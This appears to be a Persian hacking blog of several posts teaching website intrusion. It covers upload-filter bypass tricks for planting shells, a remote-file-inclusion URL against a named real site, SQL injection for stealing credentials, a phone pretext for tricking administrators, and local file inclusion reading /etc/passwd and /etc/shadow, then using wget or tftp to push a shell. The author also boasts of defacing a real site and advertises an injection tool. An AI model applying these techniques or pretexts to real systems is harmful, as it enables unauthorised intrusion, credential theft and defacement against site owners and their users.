๑۩۞۩๑ سلطان وبلاگ هك در ايران ๑۩۞۩๑

سلام دوستان عزیز .

دوستان . شما برای ارتباط با من یا درخواست + انتقادات + پیشنهادات می تونید از کادر زیراستفاده کنید

 ( لطف کنید اگه هر کاری دارید فقط با زبان فارسی بنویسید چون حال و حوصله فینگلیش ندارم )

سلام به تمام دوستان گل

امروز جديدترين روش هك براي كلاينت شخصي مي ذارم كه رو اينترنت اكسپلور 8 كاملا جواب ميده . در ضمن باگ هم خيلي ساده هست . فكر كنم فيلم را ببينيد خيلي خوبه .

پسورد : www.kamyab-hack.net

سلام دوستان عزيز .تو این پست روش های آپلود کردن در سايت يا سرور ميگيم .چندین روش برای به دست آوردن اکسس از سایت ها و سرورها وجود داره که اونارو به ترتیب براتون توضیح می دم !

1- آپلود شل از طریق بایپس ( Bypass ) کردن یا دور زدن آپلود سنتر

در این روش شما می تونید با روش ها و ترفندهای مختلفی یک آپلود سنتر رو دور بزنید یا در اصطلاح باپیسش کنید . مثلا با اضافه کردن کد GIF98;a به اول شل بعضی از آپلود سنتر ها گول می خورن و اجازه آپلود رو به شما می دن !

یک روش دیگه برای دور زدن آپلود سنتر ها وجود داره. اونم عوض کردن پسورد فایل هست . مثلا عوض کردن پسوند فایل php. به gif.php. ! که ممکنه دوباره آپلود سنتر بایپس بشه ! یا مثلا در یک سایت نوشته شما مجاز به آپلود پسوندهای زیر نیستید :

aspx , .asp , .php , .html , .htm. , ...

 خوب حالا شما در اینجور آپلود سنترها به راحتی می تونید شل خودتونو با پسورد php3. آپلود کنید !!!

نمونه فيلم :

http://www.kamyab-hack.net/post-63.aspx

http://www.kamyab-hack.net/post-93.aspx

2- استفاده از باگ های RFI

خوب همون طور که می دونید RFI به معنی Remote File Inclusion هست ! در این جور باگها شما می تویند شل اسکریپت خودتونو به راحتی در سرور Run کنید ( بدون هیچ دردسری ) یک مثال براتون می زنم :

http://www.ipsjdps.org/XOOPS/modules/xfsection/modify.php?dir_module=Adress Shell

خوب همون طور که می بینید بعد از علامت مساوی ( = ) آدرس شلم رو به صورت فایل Txt که قیلا در فضای خودم آپلود کرده بودن بهش دادم ! که آخرش هم علامت سوال ( ؟ ) گذاشتم.  دوستان حتما توجه داشته باشن که اگه علامت ? در آخر شل گذاشته نشه ، شل ران نمیشه !

نمونه فيلم :

http://www.kamyab-hack.net/post-83.aspx

3- استفاده از باگ های SQL Injection 

شما یوزر و پسورد یک سایتی رو از طریق باگ Sql به دست آوردید . شما با يه سري دستورات مي تونيد يوزر و پسورد سايت را از ديتابيس بيرون بكشيد .

نمونه فيلم :

http://www.kamyab-hack.net/post-90.aspx

4- مهندسی اجتماعی

يكي از بهترين روش هاي هست كه شما اگه نتونستيد با روش هاي بالا اكسس از يه سايت بگيريد اين بهترين گزينه هست . براي نمونه من يكي ذكر مي كنم . اول مياد يه Whios از سايت ميگيرد خب ميبينيد 100 تا سايت رو سرور هست . حالا شما بيا تماس با يكي از مديران اين سايت جا ميزنيد كه ميگيد آقا مي خواهم كرنل سرور را آپديت كنم( الكي يه چيزي سرهم كنيد ) لطف كنيد يوزر و پسورد سايتتون بديد !!!

سلام دوستان . عزيز

اول از هر چيز يه نكته را ياد آورد بشم كه من اصولا زياد سايت هك نمي كنم بلكه متودهاي هكينگ  را پياده سازي مي كنم . اما امروز بنا به دلايلي ديگه فرق مي كنه و اين سايت را هكيدم .

آدرس سايت : www.sky-dvb.com

لينك اثبات :http://zone-h.org/mirror/id/10132492

سلام دوستان گل و گلاب .

امروز مي خواهم يه سايت بهتون معرفي كنم كه بدون هيچ گونه دعوتنامه بتونيد فايل هاي بزرگ و كوچيك خودتون توش آپلود كنيد .

سایت گیگا آپلود اولین و تنها سرویس دهنده آپلود ایرانی بدون هیچگونه محدودیت است که در آن می توانید فایل های پر حجم خود را با دیگران به اشتراک بگذارید.!!

ویژگی های منحصر به فرد گیگا آپلود :

 بدون محدودیت در حجم فایل جهت آپلود

قابلیت Resume . ادامه دانلود و آپلود در صورت قطعی ارتباط - انصراف از محل قبلی

 شروع دانلود بدون انتظار

امکان دانلود تعداد نامحدود فایل به صورت همزمان

سلام دوستان عزیز . بعد از آموزش دستورات SQL Injection و RFI امروز قصد دارم آموزش كامل متود LFI به شما نشون بدم .

در این مقاله فقط توضیح کوتاهی در باره ی باگ LFI و چگونگی به وجود آوردن آن داده میشه و هدف از این مقاله آموزش استفاده از حفره ی امنیتی هستش !!!!

LFI چیه ؟ يعني Local File Inclusion یک نوع حفره ی امنیتی است که با سهل انگاری برنامه نویس به وجود میاد و به نفوذگر این امکان رو میده که بتونه فایل های سیستمی سايت مذكور رو مشاهده کنيد !

باگ LFI چگونه به وجود میاد ؟ باگ LFI با استفاده کردن نادرست برنامه نویس از توابع زير به وجود مياد .

کد:

include()

include_once()

require()

require_once()

fopen()

با LFI چه کار هایی میشه کرد؟ با استفاده از باگ Lfi کار های زیادی میشه انجام داد از جمله

خواندن فایل های مهم مثل :

etc/passwd

/etc/shadow

/etc/group

/etc/security/passwd

/etc/security/user

/etc/security/environ

/etc/security/limits

و خواندن كانفيگ سايت ....

حالا ما با دستورات زير قادريم شل آپلود کنیم یا BackConnect بگیری.

در سرور های ویندوز و لینوکس دستورات متفاوت ولی برای هر یکی مثال هایی میزنم . با استفاده از دستور Wget در لینوکس و Tftp در ویندوز می تونیم فایل مورد نظرمون رو به سرور انتقال بدیم.

بزودی هم فیلم آموزشی در این مورد قرار خواهم گذاشت .

منبع با كمي ويرايش www.qn2.org

تغییرات این ورژن:

اضافه شدن یک MD5 Cracker آنلاین
قابلیت وارد کردن جمله ی اینجکشن به صورت دستی
برطرف شدن چندین باگ

امکانات کلی برنامه :

قابليت ايجكت دیتا بیس Oracle ، دیتا بیس MsAccess
پیدا کردن صفحه ی لوگین ادمین
پروکسی
قابلیت Update. Delete. Insert اطلاعات (mssql)
قابلیت فیلتر کردن اطلاعات
ظاهر جدید (در بخش tables)
سرعت بیشتر در پیدا کردن تیبل ها برای mysql
بارگذاری cookie از صفحه
بهتر شدن آناليز برنامه

من قبلا آموزش اين برنامه را بصورات فيلم آموزشي تهيه كردم كه مي تونيد تو پست زير دانلود كنيد .

 فيلم آموزشي

  دانلود برنامه

دهها سایت وابسته به سازمان صدا و سیمای جمهوری اسلامی ایران توسط معترضین هك شدند . در میان این سایت ها ، سایت رادیو جوان ، رادیو پیام ، رادیو ورزش ، رادیو تهران و رادیو قرآن و بخش ادبی سایت سازمان صدا و سیما و همچنین سایت برخی از برنامه های این سازمان از جمله جمعه ایرانی قرار دارند.

هكرهای مذكور باقرار دادن تصویر زیر سایتهای صداوسیما را از كارانداختند ومسئولان صداوسیما نیز بلافاصله فعالیتهای سایتهای مذكور را متوقف كردند.

لینک کامل عکس

منبع